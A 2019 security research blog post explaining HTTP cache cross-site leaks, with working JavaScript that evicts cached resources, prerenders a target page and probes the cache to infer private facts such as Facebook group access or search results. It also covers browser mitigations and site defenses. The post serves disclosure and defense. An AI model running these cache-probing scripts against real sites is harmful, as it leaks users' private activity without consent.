Tuesday, March 19, 2019

[🌐💧💥] HTTP Cache Cross-Site Leaks

In this blog post I want to talk about a cool type of attack (XSLeaks) that is far more powerful than most developers and security researchers might realize.

Almost 10 years ago, Chris Evans described an attack against Yahoo! Mail in which a malicious website could search the email inbox of a visitor and learn whether the search returned results or not. This essentially could have allowed him to search the user's email word by word, and learn a lot about the emails the user received, from whom, and when.

Chris did that by simply measuring how long the server took to respond to a search query (issued through the victim's browser, so it included cookies), concluding that if the response took longer to return, the search query probably had results, and if it returned faster, it probably had none.

In his words: "the server has at least a 40ms difference in minimum latency between a query for a word not in the index, and a query for a word in the index".
The attack was cool, but since it was based on network timing, it was a bit hard to pull off. Six years later, Nethanel Gelernter and Amir Herzberg dug deeper into this attack, named it XSSearch, and used statistics to make it more reliable. In the years that followed, the attacks steadily improved, going beyond timing to browser "misfeatures" and bugs that made them a lot more stable, up to near-perfection. In other words, detecting whether a search query has results or not is now almost trivial to accomplish through a variety of tricks.

Today I want to bring attention to one of those tricks: a very reliable mechanism to query the HTTP cache in all browsers (with caveats). As far as I know, previous attacks in this area relied on timing (cached resources load faster than non-cached resources), and were mostly used for figuring out the victim's browsing history, geographic location, or for fingerprinting.

While those attacks were interesting, a more powerful variation is:
  1. Delete the cache for a specific resource (or list of resources).
  2. Force the browser to render a website (navigation, or prerender).
  3. Check if the browser cached the resource deleted at (1).
Note that what this variation gives you is the ability to figure out whether a website loads a specific resource (image, script, stylesheet, etc) or not. In other words, you can just ask the browser a question like:
When the user opens this website: https://www.facebook.com/me/friends will the profile picture of Chris Evans be requested? Or, in other words, am I friends with Chris Evans on Facebook?
Fortunately, Facebook seems to sign their URLs, so you probably can't do this attack so simply, but how about this instead?
When the user opens this website: https://www.facebook.com/groups/bugbountygroup/about will this script https://static.xx.fbcdn.net/rsrc.php/v3/yb/r/xxx.js be requested? Or in other words, do I have access to the Facebook bugbounty group?
This second attack is more broadly interesting: as long as there is a resource that loads if the user has access but doesn't load if the user doesn't, you can figure out whether the user has access to something or not.

Again, fortunately Facebook actually preloads all scripts and images regardless of whether the user has access to private groups or not.

Now, the same technique applies to search results! You can query the browser and ask:
When the user opens this website: https://www.facebook.com/messages/?qa=indonesia will this script be requested? Or in other words, has the user talked about visiting Indonesia?
Again, fortunately Facebook actually doesn't issue search queries on messages and requires the user to "confirm" the search query :-).


As you can see, some websites have deployed protections against Cross-Site Leaks in the past year, some more effective than others, and I think this is one of those few attacks that only large websites try to protect against, while most of the internet remains vulnerable.

So, now that I've described the attack, here's how to do it! The summary of the trick is that it allows you to do two things:
  1. Delete the HTTP Cache for a specific resource or URL
  2. Query the HTTP Cache to see if the browser cached it
To delete the HTTP cache entry for a resource, you just have to either issue a POST request to it, or use the fetch API with cache: "reload" in a way that makes the server return an error (eg, by setting an overlong HTTP referrer), which leads to the browser not caching the error response and invalidating the previously cached one.
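To make this concrete, here's a minimal sketch of the eviction step. It assumes the attacker's page can make its own URL (and therefore the Referer it sends) very long via history.replaceState, and that the target server rejects requests with an overlong Referer header (many do, with a 4xx error); the resource URL and the padding size are just for illustration.

```js
// Minimal sketch of step (1): evicting a URL from the HTTP cache.
// Assumption: the target server rejects requests whose Referer header
// is too long (e.g. with a 4xx such as 431). The URL and padding size
// below are made up for illustration.

const RESOURCE = 'https://static.xx.fbcdn.net/rsrc.php/v3/yb/r/xxx.js';

async function evictFromCache(url) {
  // Make our own page URL (and therefore the Referer we send) absurdly long.
  history.replaceState(null, '', '/' + 'a'.repeat(60000));

  // cache: 'reload' forces a network request and tells the browser to
  // replace whatever it had cached for this URL with the new response.
  // Because the server errors out on the huge Referer, the error response
  // isn't cached and the old entry is invalidated.
  // (The other option from the post: a plain POST request to the URL.)
  await fetch(url, {
    cache: 'reload',
    mode: 'no-cors',
    credentials: 'include',
    referrerPolicy: 'unsafe-url', // send the full (overlong) URL as Referer
  }).catch(() => {});

  // Restore a short URL so later steps start from a clean state.
  history.replaceState(null, '', '/');
}
```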

Then, after you navigate the user to the site you want to query (either through link rel=prerender, or by navigating another window or frame), you check whether the resource was cached. You do that with the same overlong HTTP referrer trick: if the resource was cached, it loads successfully without touching the network, and if it wasn't, the request goes to the server and fails. You can see an example of this attack here (that terjanq was nice enough to set up :-).
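Here's a sketch of the rendering and probing steps, reusing evictFromCache from the sketch above. The page and resource URLs are hypothetical, the 3-second wait is an arbitrary guess at how long the render needs, and the probe assumes the resource is a script; for an image (such as a profile picture), new Image() with the same onload/onerror handlers works the same way.

```js
// Minimal sketch of steps (2) and (3): render the target page, then
// check whether it pulled RESOURCE into the HTTP cache.

const TARGET_PAGE = 'https://www.facebook.com/groups/bugbountygroup/about';

function renderTarget(url) {
  // Ask the browser to fetch and render the page in the background.
  // (Alternatively: window.open(url), or navigating an iframe/window.)
  const link = document.createElement('link');
  link.rel = 'prerender';
  link.href = url;
  document.head.appendChild(link);
}

function isCached(url) {
  // Make our Referer overlong again: a cache hit never touches the
  // network, so the load succeeds; a cache miss goes to the server,
  // which rejects the huge Referer, so the load fails.
  history.replaceState(null, '', '/' + 'a'.repeat(60000));
  return new Promise((resolve) => {
    const probe = document.createElement('script');
    probe.referrerPolicy = 'unsafe-url';
    probe.onload = () => resolve(true);   // served from the cache
    probe.onerror = () => resolve(false); // went to the network and errored
    probe.src = url;
    document.head.appendChild(probe);
  }).finally(() => history.replaceState(null, '', '/'));
}

// Putting it together with the eviction helper from the previous sketch:
async function targetPageLoads(resource, page) {
  await evictFromCache(resource);
  renderTarget(page);
  await new Promise((r) => setTimeout(r, 3000)); // crude wait for the render
  return isCached(resource);
}
```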

Here's a nicer explanation of the attack (with a happy cloud and everything):

Depending on who you are, you might be excited about this, depressed, angry, or ambivalent. Here are some suggestions on how to deal with it:
  1. If you are a website author, you might want to think about whether you have any of these leaks, and maybe try to protect against them (see defenses below).
  2. If you are a security researcher, you might want to check the websites you use to see if they are vulnerable (check caveats below).
  3. If you are a browser vendor, you might want to consider implementing double keyed cache (see caveats below).
You are probably wondering what these caveats I keep mentioning are, so here we go:
  • The attack is "complicated" for Safari users, because Safari has something called "Verified Partitioned Cache", a technique for preventing user tracking that also accidentally helps here. It works by keying cache entries on both their origin and the site that loaded the resource. The attack is still possible (because the caching behavior is based on heuristics), but the details are probably worth a separate blog post.
  • Chrome will hopefully not be vulnerable anymore - Chrome is experimenting with "Split Disk Cache", which is somewhat different from Safari's approach but has the side effect of protecting against this attack. Note that this feature is currently behind a flag (--enable-features=SplitCacheByTopFrameOrigin), so test it out and send feedback to Chrome =).
  • Firefox users are vulnerable, but they have a preference they can enable to get similar behavior - it's called "First Party Isolation", and is available as an add-on and as a pref (privacy.firstparty.isolate=true). It takes the approach implemented in Chrome a few steps further, splitting not only the cache but several other things (such as permissions!), so test it out too, and send feedback to Firefox.
And if you are a web developer and are thinking about ways to defend against this, well, I have good news and bad news:
  • You can just disable HTTP cache. This has some bandwidth and performance consequences, though, so maybe don't do that.
  • You can add CSRF tokens to everything. This breaks all bookmarks that your users might have set, so maybe don't do that.
  • You can use SameSite=strict cookies to authenticate users. This is surprisingly well supported across browsers, and doesn't break bookmarks. Note, however, that there are some known bypasses (eg, if the site has certain types of open redirects, as well as browser implementation bugs). See the sketch after this list.
  • You can use COOP to slow attackers down (so every attack requires a click). Note, however, that it is only implemented in Firefox, and even there it is behind a pref (browser.tabs.remote.useCrossOriginOpenerPolicy), so test it out and send feedback to Firefox =).
  • You can do all the crazy things that Facebook apparently tries to do to protect against this! Or take a look at this page with some more ideas.
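As a rough illustration of the first and third suggestions above, here is a minimal sketch of what the response headers could look like, written as a tiny Node.js handler; the endpoint, cookie name, and token are made up for illustration.

```js
// Minimal sketch of two defenses: a SameSite=Strict session cookie plus
// Cache-Control: no-store on sensitive responses. The endpoint, cookie
// name and value are hypothetical.
const http = require('http');

http.createServer((req, res) => {
  if (req.url.startsWith('/login')) {
    // The cookie is only sent on same-site requests, so a cross-site
    // navigation or prerender from an attacker page arrives unauthenticated.
    res.setHeader('Set-Cookie',
      'session=opaque-token; Path=/; Secure; HttpOnly; SameSite=Strict');
  }
  // Keep sensitive, per-user responses out of the HTTP cache entirely.
  res.setHeader('Cache-Control', 'no-store');
  res.end('ok');
}).listen(8080);
```

Note that no-store is only worth applying to responses you consider sensitive; doing it everywhere has the bandwidth and performance cost mentioned above.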
🌐💧💥

I want to end this blog post by saying that the HTTP cache is not the only leak there is - there are a ton more! So protecting against the cache alone is not enough: you can also detect the length of the page, the JS execution cycles, the content-type, the number of TCP sockets, and many more. If you are a security researcher, please contribute! The XSLeaks wiki is a joint effort among several security researchers (terjanq, lbherrera_, ronmasas, _tsuro, arthursaftnes, kkotowicz, and me) trying to explore the limits of cross-site leaks, and hopefully by working together we can come up with better attacks :-). Contact me on Twitter if you want to contribute (DMs are open).

Thanks for reading!